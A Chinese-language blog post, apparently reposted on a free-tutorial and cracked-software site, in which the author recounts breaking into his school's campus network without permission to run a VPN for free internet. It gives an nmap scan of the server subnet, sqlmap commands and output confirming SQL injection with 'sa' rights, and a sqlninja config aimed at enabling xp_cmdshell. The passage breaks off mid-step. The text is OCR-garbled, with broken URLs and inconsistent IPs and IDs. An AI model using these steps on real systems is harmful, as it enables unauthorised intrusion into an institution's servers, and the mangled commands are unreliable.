?

免費教程_免費網賺教程_破解版軟件-寂涯網絡學習基地

當前位置: 主頁 > 網站相關 > 網站安全 > 滲透學校校園網并架設vpn

滲透學校校園網并架設vpn

時間:2012-05-01 15:06來源:未知 整理:寂涯網絡 點擊:

某次去機房突然看到了掛在墻上的網絡拓撲圖,從而了解整個學院的網絡分布情況。正好泄露了網絡拓撲結果,于是在了解拓撲結構的情況下,展開了一次滲透測試。在此題外話一句,不知為何現在的學校喜歡把網絡拓撲圖詳細地貼在墻上,女友學校的網絡拓撲圖還竟然公開在學校的網站上,實在無語。我簡略繪制本校的拓撲結構,如圖1:
學校拓撲結構圖
整個學院內部用的10.10.0.0網段的IP地址,學院有DHCP、DNS、Web、FTP服務器, 它們都共同位于10.10.8.0網段。
我們宿舍每個人的書桌下有網線插孔,從拓撲圖中就可以看出,雖然沒有開通上網,只要網線插上去,同樣可以跨網段訪問,也就是對web服務器可以訪問的,經過掃描,還有不少內部網站,比如在線電影之類的。
我的想法是拿下某一臺機器的權限,然后開個vpn來上網。為了長期使用,我選擇了對服務器下手,先就選擇了web服務器。順便說下,我主要用的backtrack5作為滲透環境, 所使用的大部分工具均來源于BackTrack5中。
WEB服務器是在10.10.8.0這個網段的,首先用Nmap對整個網段進行掃描:
root§bt:^# nmap -sS -p 80 10. 10. 8.1-254 —open
其中,,參數代表只掃描指定端口,參數后跟欲掃描的端口號;--open的表示結果只顯示開放了80端口的主機;10.10.8.1-254是1?地址的范圍,指代10.10.8.1~10.10.8.254,
因為255是廣播地址,所以只用掃到254即可。只用了3秒多,就掃描完了整個網段,結果如圖2:
backtrack5掃描

我選擇了 10.10.8.15這個目標站,因為它是asp.net架構的,如果有注入,較容易提權(后面事實證明的確非常好提權)。
打開以后竟然是一個旅游方面的網站,記得在學校某內部網站找到這個網站的鏈接,標明的是網絡協會的,可見大學學生的東西有多雜。
隨便點開了一則新聞的頁面,然后用sqlmap掃描:
sqlmap. py -u "http://10. 10. 8. 51/Web/News/0piniondetail. aspx9id=54^
很快就返回了如下文字:_
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=53’ AND 9442=9442 AND ’fVBu,=,fVBu
web server operating system: Windows 2003
web application technology: ASP. NET, Microsoft IIS 6. 0, ASP. NET 4. 0.30128 back-end DBMS: Microsoft SQL Server 2005 [*] shutting down at: 13:14:52
看來的確有注入,詳細信息都在上面了,操作系統是windows 2003, 1186.0以及數據庫是MSSQL 2005。立即看看數據庫當前的用戶名,提交如下命令:
/sqlmap. py -u "http://10. 10. 8. 51/Web/News/0piniondetail. aspx9id=54^
—current—user
以下是從sqlmap返回的一長串信息中摘下的:
[13:35:28] [INFO] fetching current user
[13:35:28] [INFO] read from file
’/pentest/database/sqlmap/output/10.10. 8. 51/session’ : sa

顯示了當前用戶名是sa,如果真的是sa權限,那么已經成功了一半以上了。提交以下 命令查看當前用戶的權限:
• /sqlmap. py -u "http://10. 10. 8. 51/Web/News/0piniondetail. aspx9id=54^
—privileges
摘下的關鍵返回信息,如下:
database management system users privileges:
[*] nx
[*] sa (administrator)
果然是sa權限,趕緊換成sqlninja,Backtrack5中的Sqlninja是新版本,新版本的 Sqlninja已經不和以前的配置方法一樣了,需要先建一個配置文件。在終端中鍵入touch 001^.001^建立一個配置文件,針對此次攻擊,我的配置文件如下:
—httprequest_start—
GET http://10. 10. 8. 51/Web/News/0piniondetail. aspx?id=53’ ;/**/_SQL2INJECT_ HTTP/1.1
Host: 10. 10. 8. 51
User-Agent: Mozilla/5. 0 (X11; U; Linux i686; en-US; rv:l. 7.13) Gecko/20060418 Firefox/l. 0. 8 Connection: close —httprequest_end—
Sqlninja的配置文件格式用了標準的HTTP請求,以一httprequest_start—和--httprequest_end--—作為開始和結束,get中url后面的_sql2inject—會被sqlninja自動替換成相應的注入語句。
保存文件。由于SQL Server2005默認是禁用了 xp_cmdshell的,所以首先需要恢復 xp_cmdshell存儲過程,鍵入命令:
[email protected]:/pentest/database/sqlninja

本頁地址 http://www.ionrce.tw/wangzhananquan/20120501889.html

百度搜索更多

谷歌搜索更多

頂一下
(4)
80%
踩一下
(1)
20%
------分隔線----------------------------
?
評價:
昵稱: 驗證碼:點擊我更換圖片
推薦內容
贊助商
贊助商
?

關于本站免責聲明視頻更新google百度地圖視頻地圖RRS訂閱

如有什么問題請在本站留言,或發郵件到 hxt167#foxmail.com

内蒙古十一选五基本走势图手机版